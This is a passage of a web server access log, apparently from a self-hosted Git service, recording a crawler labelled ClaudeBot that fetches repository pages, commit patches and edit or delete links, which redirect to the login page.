"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/projects.sln" -[15/Feb/2026:08:09:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/projects.sln" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/projects.sln" -[15/Feb/2026:08:09:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup" -[15/Feb/2026:08:09:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main" [Client 216.73.216.188] [Length 14727] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/graph" [Client 216.73.216.188] [Length 9938] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main" [Client 216.73.216.188] [Length 14570] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcConnectionTest" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcConnectionTest" -[15/Feb/2026:08:09:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj" [Client 216.73.216.188] [Length 11769] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/tags.rss" [Client 216.73.216.188] [Length 347] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/tags.rss" [Client 216.73.216.188] [Length 343] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_upload/main/OpcConnectionTest" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/activity/code-frequency" [Client 216.73.216.188] [Length 7534] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_upload/main/OpcConnectionTest" -[15/Feb/2026:08:09:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/main..main" [Client 216.73.216.188] [Length 8371] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/main...main" [Client 216.73.216.188] [Length 8394] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/Program.cs" [Client 216.73.216.188] [Length 17920] [Gzip 5.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/.vscode" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/.vscode" -[15/Feb/2026:08:09:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/.TemporaryDocument" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm" -[15/Feb/2026:08:09:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/.TemporaryDocument" -[15/Feb/2026:08:09:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal" -[15/Feb/2026:08:09:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/graph" [Client 216.73.216.188] [Length 9641] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker" -[15/Feb/2026:08:09:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/graph" [Client 216.73.216.188] [Length 9095] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/.Notebook" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/compare/main..main" [Client 216.73.216.188] [Length 8386] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/.Notebook" -[15/Feb/2026:08:09:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/compare/main..main" [Client 216.73.216.188] [Length 8374] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/compare/main...main" [Client 216.73.216.188] [Length 8409] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/compare/main...main" [Client 216.73.216.188] [Length 8396] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/html" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcConnectionTest" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/html" -[15/Feb/2026:08:09:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcConnectionTest" -[15/Feb/2026:08:09:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.assets.cache" [Client 216.73.216.188] [Length 10936] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/Dockerfile" [Client 216.73.216.188] [Length 12665] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app" [Client 216.73.216.188] [Length 10772] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/activity/yearly" [Client 216.73.216.188] [Length 8588] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/import_csv.py" [Client 216.73.216.188] [Length 14503] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/nginx-reverse-proxy.conf" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/metadata.json" [Client 216.73.216.188] [Length 11490] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal" -[15/Feb/2026:08:09:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/docker-compose.yml" [Client 216.73.216.188] [Length 13835] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/.Notebook" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb.patch" [Client 216.73.216.188] [Length 396491] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/services" [Client 216.73.216.188] [Length 10146] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/18fa480c84b358da8bf50d54057f53591759225f.patch" [Client 216.73.216.188] [Length 1473] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/nginx-reverse-proxy.conf" -[15/Feb/2026:08:09:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/README.md" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/.Notebook" -[15/Feb/2026:08:09:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb.diff" [Client 216.73.216.188] [Length 128761] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/README.md" -[15/Feb/2026:08:09:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/README.md" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/activity/contributors" [Client 216.73.216.188] [Length 7616] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/README.md" -[15/Feb/2026:08:09:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/nginx-reverse-proxy.conf" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues/new" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/nginx-reverse-proxy.conf" -[15/Feb/2026:08:09:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2.patch" [Client 216.73.216.188] [Length 3512] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues/new" -[15/Feb/2026:08:09:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" [Client 216.73.216.188] [Length 11133] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/Dockerfile" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/init_db.py" [Client 216.73.216.188] [Length 16388] [Gzip 5.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/Dockerfile" -[15/Feb/2026:08:09:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e.patch" [Client 216.73.216.188] [Length 287418] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main" [Client 216.73.216.188] [Length 17088] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/html" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/package.json" [Client 216.73.216.188] [Length 11916] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/html" -[15/Feb/2026:08:09:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.AssemblyReference.cache" [Client 216.73.216.188] [Length 10968] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2.diff" [Client 216.73.216.188] [Length 3101] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:38 +0000] - 200 200 - GET 